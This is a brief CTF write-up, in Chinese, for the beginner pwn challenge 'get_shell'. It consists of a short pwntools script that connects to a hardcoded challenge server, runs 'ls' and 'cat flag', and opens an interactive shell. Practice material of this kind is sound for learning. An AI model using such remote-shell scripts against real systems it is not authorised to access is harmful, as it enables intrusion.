###### tags: `攻防世界新手區` # Pwn/get_shell - 題目: 運行就能獲得shell nc 111.198.29.45 54766 ```python ## pwntools 新手入門必須了解的工具 from pwn import * context.log_level = 'debug' io = remote('111.198.29.45', 54766) io.sendline('ls') io.sendline('cat flag') io.interactive() ```